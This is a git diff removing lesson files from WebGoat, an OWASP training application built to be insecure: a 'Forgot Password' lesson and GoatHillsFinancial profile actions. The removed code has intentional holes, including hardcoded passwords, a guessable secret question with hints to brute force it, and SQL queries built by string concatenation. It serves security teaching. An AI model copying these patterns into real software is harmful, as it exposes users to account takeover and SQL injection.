- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Eric Sheridan Aspect Security
- * @created December 18, 2005
- */
-public class ForgotPassword extends LessonAdapter
-{
-
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- private final static String USERNAME = "Username";
-
- private static String USERNAME_RESPONSE = "";
-
- private final static String COLOR = "Color";
-
- private static String COLOR_RESPONSE = "";
-
- private static int STAGE = 1;
-
- private final static HashMap USERS = new HashMap();
-
- private final static HashMap COLORS = new HashMap();
-
- private void populateTables()
- {
- USERS.put("admin", "2275$starBo0rn3");
- USERS.put("jeff", "(_I_)illia(V)s");
- USERS.put("dave", "\\V/ich3r$");
- USERS.put("intern", "H3yn0w");
- USERS.put("webgoat", "webgoat");
-
- COLORS.put("admin", "green");
- COLORS.put("jeff", "orange");
- COLORS.put("dave", "purple");
- COLORS.put("intern", "yellow");
- COLORS.put("webgoat", "red");
- }
-
- protected Element doStage1(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec.addElement(new BR().addElement(new H1().addElement("Webgoat Password Recovery ")));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR tr = new TR();
- tr.addElement(new TH()
- .addElement("Please input your username. See the OWASP admin if you do not have an account.")
- .setColSpan(2).setAlign("left"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
-
- TR row1 = new TR();
- row1.addElement(new TD(new B(new StringElement("*User Name: "))));
-
- Input input1 = new Input(Input.TEXT, USERNAME, "");
- row1.addElement(new TD(input1));
- t.addElement(row1);
-
- Element b = ECSFactory.makeButton("Submit");
- t.addElement(new TR(new TD(b)));
- ec.addElement(t);
-
- return (ec);
- }
-
- protected Element doStage2(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec.addElement(new H1().addElement("Webgoat Password Recovery "));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR tr = new TR();
- tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2)
- .setAlign("left"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement("*Required Fields").setWidth("30%"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(" ").setColSpan(2));
- t.addElement(tr);
-
- TR row1 = new TR();
- row1.addElement(new TD(new B(new StringElement("*Answer: "))));
-
- Input input1 = new Input(Input.TEXT, COLOR, "");
- row1.addElement(new TD(input1));
- t.addElement(row1);
-
- Element b = ECSFactory.makeButton("Submit");
- t.addElement(new TR(new TD(b)));
- ec.addElement(t);
-
- return (ec);
- }
-
- protected Element doStage3(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- ec.addElement(new H1().addElement("Webgoat Password Recovery "));
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- TR tr = new TR();
- tr.addElement(new TH().addElement("For security reasons, please change your password immediately.")
- .setColSpan(2).setAlign("left"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:"))))
- .setAlign("left"));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(new StringElement("Username: " + USERNAME_RESPONSE)));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(new StringElement("Color: " + COLOR_RESPONSE)));
- t.addElement(tr);
-
- tr = new TR();
- tr.addElement(new TD().addElement(new StringElement("Password: " + USERS.get(USERNAME_RESPONSE).toString())));
- t.addElement(tr);
-
- ec.addElement(t);
-
- if (USERNAME_RESPONSE.equals("admin") && COLOR_RESPONSE.equals("green"))
- {
- makeSuccess(s);
- }
- else if (!USERNAME_RESPONSE.equals("webgoat") && USERS.containsKey(USERNAME_RESPONSE))
- {
- s.setMessage("Close. Now try to get the password of a privileged account.");
- }
- return ec;
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String username = "";
- String color = "";
-
- color = s.getParser().getStringParameter(COLOR, "");
-
- if (color.length() > 0)
- STAGE = 2;
- else
- STAGE = 1;
-
- if (USERS.size() == 0)
- {
- populateTables();
- }
-
- if (STAGE == 2)
- {
- color = s.getParser().getStringParameter(COLOR, "");
-
- if (COLORS.get(USERNAME_RESPONSE).equals(color))
- {
- STAGE = 1;
- COLOR_RESPONSE = color;
- ec.addElement(doStage3(s));
- }
- else
- {
- s.setMessage("Incorrect response for " + USERNAME_RESPONSE + ". Please try again!");
- ec.addElement(doStage2(s));
- }
- }
- else if (STAGE == 1)
- {
- username = s.getParser().getStringParameter(USERNAME, "");
-
- if (USERS.containsKey(username))
- {
- STAGE = 2;
- USERNAME_RESPONSE = username;
- ec.addElement(doStage2(s));
- }
- else
- {
- if (username.length() > 0)
- {
- s.setMessage("Not a valid username. Please try again.");
- }
- ec.addElement(doStage1(s));
- }
- }
- else
- {
- ec.addElement(doStage1(s));
- STAGE = 1;
- }
-
- return ec;
- }
-
- /**
- * Gets the category attribute of the ForgotPassword object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
-
- return Category.AUTHENTICATION;
- }
-
- /**
- * Gets the hints attribute of the HelloScreen object
- *
- * @return The hints value
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
-
- hints.add("There is no lock out policy in place, brute force your way!");
- hints.add("Try using usernames you might encounter throughout WebGoat.");
- hints.add("There are only so many possible colors, can you guess one?");
- hints.add("The administrative account is \"admin\"");
-
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(15);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Forgot Password");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
deleted file mode 100644
index d0df80232..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java
+++ /dev/null
@@ -1,330 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public abstract class DefaultLessonAction implements LessonAction
-{
- // FIXME: We could parse this class name to get defaults for these fields.
- private String lessonName;
- private String actionName;
-
- private GoatHillsFinancial lesson;
-
- public DefaultLessonAction(GoatHillsFinancial lesson, String lessonName, String actionName)
- {
- this.lesson = lesson;
- this.lessonName = lessonName;
- this.actionName = actionName;
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException, ValidationException
- {
- getLesson().setCurrentAction(s, getActionName());
-
- if (isAuthenticated(s))
- {
- }
- else
- throw new UnauthenticatedException();
- }
-
- public abstract String getNextPage(WebSession s);
-
- public GoatHillsFinancial getLesson()
- {
- return lesson;
- }
-
- public String getLessonName()
- {
- return lessonName;
- }
-
- public String getActionName()
- {
- return actionName;
- }
-
- public void setSessionAttribute(WebSession s, String name, Object value)
- {
- s.getRequest().getSession().setAttribute(name, value);
- }
-
- public void setRequestAttribute(WebSession s, String name, Object value)
- {
- s.getRequest().setAttribute(name, value);
- }
-
- public void removeSessionAttribute(WebSession s, String name)
- {
- s.getRequest().getSession().removeAttribute(name);
- }
-
- protected String getSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
- {
- String value = (String) s.getRequest().getSession().getAttribute(name);
- if (value == null) { throw new ParameterNotFoundException(); }
-
- return value;
- }
-
- protected boolean getBooleanSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
- {
- boolean value = false;
-
- Object attribute = s.getRequest().getSession().getAttribute(name);
- if (attribute == null)
- {
- throw new ParameterNotFoundException();
- }
- else
- {
- // System.out.println("Attribute " + name + " is of type " +
- // s.getRequest().getSession().getAttribute(name).getClass().getName());
- // System.out.println("Attribute value: " +
- // s.getRequest().getSession().getAttribute(name));
- value = ((Boolean) attribute).booleanValue();
- }
- return value;
- }
-
- protected int getIntSessionAttribute(WebSession s, String name) throws ParameterNotFoundException
- {
- int value = -1;
- String ss = (String) s.getRequest().getSession().getAttribute(name);
- if (ss == null)
- {
- throw new ParameterNotFoundException();
- }
- else
- {
- try
- {
- value = Integer.parseInt(ss);
- } catch (NumberFormatException nfe)
- {
- }
- }
-
- return value;
- }
-
- protected String getRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
- {
- String value = (String) s.getRequest().getAttribute(name);
- if (value == null) { throw new ParameterNotFoundException(); }
-
- return value;
- }
-
- protected int getIntRequestAttribute(WebSession s, String name) throws ParameterNotFoundException
- {
- int value = -1;
- String ss = (String) s.getRequest().getAttribute(name);
- if (ss == null)
- {
- throw new ParameterNotFoundException();
- }
- else
- {
- try
- {
- value = Integer.parseInt(ss);
- } catch (NumberFormatException nfe)
- {
- }
- }
-
- return value;
- }
-
- public int getUserId(WebSession s) throws ParameterNotFoundException
- {
- return getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID);
- }
-
- public String getUserName(WebSession s) throws ParameterNotFoundException
- {
- String name = null;
-
- int employeeId = getUserId(s);
- try
- {
- String query = "SELECT first_name FROM employee WHERE userid = " + employeeId;
-
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- if (answer_results.next()) name = answer_results.getString("first_name");
- } catch (SQLException sqle)
- {
- s.setMessage("Error getting user name");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error getting user name");
- e.printStackTrace();
- }
-
- return name;
- }
-
- public boolean requiresAuthentication()
- {
- // Default to true
- return true;
- }
-
- public boolean isAuthenticated(WebSession s)
- {
- boolean authenticated = false;
-
- try
- {
- authenticated = getBooleanSessionAttribute(s, getLessonName() + ".isAuthenticated");
- } catch (ParameterNotFoundException e)
- {
- }
-
- return authenticated;
- }
-
- public boolean isAuthorized(WebSession s, int employeeId, String functionId)
- {
- String employer_id = (String) s.getRequest().getSession()
- .getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID);
- // System.out.println("Authorizing " + employeeId + " for use of function: " + functionId +
- // " having USER_ID = "
- // + employer_id );
- boolean authorized = false;
-
- try
- {
- String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = "
- + employeeId + ") and functionid = '" + functionId + "'";
-
- try
- {
- Statement answer_statement = WebSession.getConnection(s)
- .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet answer_results = answer_statement.executeQuery(query);
- authorized = answer_results.first();
-
- /*
- * User is validated for function, but can the user perform that function on the
- * specified user?
- */
- if (authorized)
- {
- authorized = isAuthorizedForEmployee(s, Integer.parseInt(employer_id), employeeId);
- }
- } catch (SQLException sqle)
- {
- s.setMessage("Error authorizing");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error authorizing");
- e.printStackTrace();
- }
-
- // System.out.println("Authorized? " + authorized);
- return authorized;
- }
-
- public boolean isAuthorizedForEmployee(WebSession s, int userId, int employeeId)
- {
- // System.out.println("Authorizing " + userId + " for access to employee: " + employeeId);
- boolean authorized = false;
-
- try
- {
- String query = "SELECT * FROM ownership WHERE employer_id = ? AND employee_id = ?";
-
- try
- {
-
- PreparedStatement answer_statement = WebSession.getConnection(s)
- .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- answer_statement.setInt(1, userId);
- answer_statement.setInt(2, employeeId);
- ResultSet answer_results = answer_statement.executeQuery();
- authorized = answer_results.first();
- } catch (SQLException sqle)
- {
- s.setMessage("Error authorizing");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error authorizing");
- e.printStackTrace();
- }
-
- return authorized;
- }
-
- protected void setStage(WebSession s, String stage)
- {
- getLesson().setStage(s, stage);
- }
-
- protected void setStageComplete(WebSession s, String stage)
- {
- getLesson().setStageComplete(s, stage);
- }
-
- protected String getStage(WebSession s)
- {
- return getLesson().getStage(s);
- }
-
- public String toString()
- {
- return getActionName();
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
deleted file mode 100644
index f4c977670..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
+++ /dev/null
@@ -1,111 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class DeleteProfile extends DefaultLessonAction
-{
-
- private LessonAction chainedAction;
-
- public DeleteProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
- {
- super(lesson, lessonName, actionName);
- this.chainedAction = chainedAction;
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException, ValidationException
- {
- getLesson().setCurrentAction(s, getActionName());
-
- int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
- int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-
- if (isAuthenticated(s))
- {
- deleteEmployeeProfile(s, userId, employeeId);
-
- try
- {
- chainedAction.handleRequest(s);
- } catch (UnauthenticatedException ue1)
- {
- // System.out.println("Internal server error");
- ue1.printStackTrace();
- } catch (UnauthorizedException ue2)
- {
- // System.out.println("Internal server error");
- ue2.printStackTrace();
- }
- }
- else
- throw new UnauthenticatedException();
-
- }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.LISTSTAFF_ACTION;
- }
-
- public void deleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
- {
- try
- {
- // Note: The password field is ONLY set by ChangePassword
- String query = "DELETE FROM employee WHERE userid = " + employeeId;
- // System.out.println("Query: " + query);
- try
- {
- Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- statement.executeUpdate(query);
- } catch (SQLException sqle)
- {
- s.setMessage("Error deleting employee profile");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error deleting employee profile");
- e.printStackTrace();
- }
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
deleted file mode 100644
index 69909bb06..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
+++ /dev/null
@@ -1,115 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class EditProfile extends DefaultLessonAction
-{
-
- public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
- {
- super(lesson, lessonName, actionName);
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException
- {
- getLesson().setCurrentAction(s, getActionName());
-
- if (isAuthenticated(s))
- {
- int userId = getUserId(s);
- int employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
-
- Employee employee = getEmployeeProfile(s, userId, employeeId);
- setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
- }
- else
- throw new UnauthenticatedException();
- }
-
- public String getNextPage(WebSession s)
- {
- return GoatHillsFinancial.EDITPROFILE_ACTION;
- }
-
- public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
- {
- Employee profile = null;
-
- // Query the database for the profile data of the given employee
- try
- {
- String query = "SELECT * FROM employee WHERE userid = ?";
-
- try
- {
- PreparedStatement answer_statement = WebSession.getConnection(s)
- .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- answer_statement.setInt(1, subjectUserId);
- ResultSet answer_results = answer_statement.executeQuery();
- if (answer_results.next())
- {
- // Note: Do NOT get the password field.
- profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
- answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
- .getString("title"), answer_results.getString("phone"), answer_results
- .getString("address1"), answer_results.getString("address2"), answer_results
- .getInt("manager"), answer_results.getString("start_date"), answer_results
- .getInt("salary"), answer_results.getString("ccn"), answer_results
- .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
- .getString("disciplined_notes"), answer_results.getString("personal_description"));
- /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
- * " " + profile.getLastName() + " (" + profile.getId() + ")");
- */}
- } catch (SQLException sqle)
- {
- s.setMessage("Error getting employee profile");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error getting employee profile");
- e.printStackTrace();
- }
-
- return profile;
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
deleted file mode 100644
index c38b14b44..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
+++ /dev/null
@@ -1,161 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class FindProfile extends DefaultLessonAction
-{
-
- private LessonAction chainedAction;
-
- public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
- {
- super(lesson, lessonName, actionName);
- this.chainedAction = chainedAction;
- }
-
- public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
- UnauthorizedException, ValidationException
- {
- if (isAuthenticated(s))
- {
- int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
-
- String pattern = s.getParser().getRawParameter(GoatHillsFinancial.SEARCHNAME);
-
- findEmployeeProfile(s, userId, pattern);
-
- // Execute the chained Action if the employee was found.
- if (foundEmployee(s))
- {
- try
- {
- chainedAction.handleRequest(s);
- } catch (UnauthenticatedException ue1)
- {
- // System.out.println("Internal server error");
- ue1.printStackTrace();
- } catch (UnauthorizedException ue2)
- {
- // System.out.println("Internal server error");
- ue2.printStackTrace();
- }
- }
- }
- else
- throw new UnauthenticatedException();
- }
-
- public String getNextPage(WebSession s)
- {
- String page = GoatHillsFinancial.SEARCHSTAFF_ACTION;
-
- if (foundEmployee(s)) page = GoatHillsFinancial.VIEWPROFILE_ACTION;
-
- return page;
- }
-
- private boolean foundEmployee(WebSession s)
- {
- boolean found = false;
- try
- {
- getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
- found = true;
- } catch (ParameterNotFoundException e)
- {
- }
-
- return found;
- }
-
- public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException
- {
- Employee profile = null;
- // Clear any residual employee id's in the session now.
- removeSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
-
- // Query the database for the profile data of the given employee
- try
- {
- String query = "SELECT * FROM employee WHERE first_name LIKE ? OR last_name LIKE ?";
-
- try
- {
- PreparedStatement answer_statement = WebSession.getConnection(s)
- .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- answer_statement.setString(1, "%" + pattern + "%");
- answer_statement.setString(2, "%" + pattern + "%");
- ResultSet answer_results = answer_statement.executeQuery();
-
- // Just use the first hit.
- if (answer_results.next())
- {
- int id = answer_results.getInt("userid");
- // Note: Do NOT get the password field.
- profile = new Employee(id, answer_results.getString("first_name"), answer_results
- .getString("last_name"), answer_results.getString("ssn"),
- answer_results.getString("title"), answer_results.getString("phone"), answer_results
- .getString("address1"), answer_results.getString("address2"), answer_results
- .getInt("manager"), answer_results.getString("start_date"), answer_results
- .getInt("salary"), answer_results.getString("ccn"), answer_results
- .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
- .getString("disciplined_notes"), answer_results.getString("personal_description"));
-
- /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
- * " " + profile.getLastName() + " (" + profile.getId() + ")");
- */
- setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id));
- }
- } catch (SQLException sqle)
- {
- s.setMessage("Error finding employee profile");
- sqle.printStackTrace();
- }
- } catch (Exception e)
- {
- s.setMessage("Error finding employee profile");
- e.printStackTrace();
- }
-
- return profile;
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
deleted file mode 100644
index acd026747..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
+++ /dev/null
@@ -1,327 +0,0 @@
-
-package org.owasp.webgoat.lessons.GoatHillsFinancial;
-
-import java.util.ArrayList;
-import java.util.Hashtable;
-import java.util.List;
-import java.util.Map;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.lessons.RandomLessonAdapter;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- */
-public class GoatHillsFinancial extends RandomLessonAdapter
-{
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
- .addElement(
- new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
- .setVspace(0));
-
- public final static String DESCRIPTION = "description";
-
- public final static String DISCIPLINARY_DATE = "disciplinaryDate";
-
- public final static String DISCIPLINARY_NOTES = "disciplinaryNotes";
-
- public final static String CCN_LIMIT = "ccnLimit";
-
- public final static String CCN = "ccn";
-
- public final static String SALARY = "salary";
-
- public final static String START_DATE = "startDate";
-
- public final static String MANAGER = "manager";
-
- public final static String ADDRESS1 = "address1";
-
- public final static String ADDRESS2 = "address2";
-
- public final static String PHONE_NUMBER = "phoneNumber";
-
- public final static String TITLE = "title";
-
- public final static String SSN = "ssn";
-
- public final static String LAST_NAME = "lastName";
-
- public final static String FIRST_NAME = "firstName";
-
- public final static String PASSWORD = "password";
-
- public final static String EMPLOYEE_ID = "employee_id";
-
- public final static String USER_ID = "user_id";
-
- public final static String SEARCHNAME = "search_name";
-
- public final static String SEARCHRESULT_ATTRIBUTE_KEY = "SearchResult";
-
- public final static String EMPLOYEE_ATTRIBUTE_KEY = "Employee";
-
- public final static String STAFF_ATTRIBUTE_KEY = "Staff";
-
- public final static String LOGIN_ACTION = "Login";
-
- public final static String LOGOUT_ACTION = "Logout";
-
- public final static String LISTSTAFF_ACTION = "ListStaff";
-
- public final static String SEARCHSTAFF_ACTION = "SearchStaff";
-
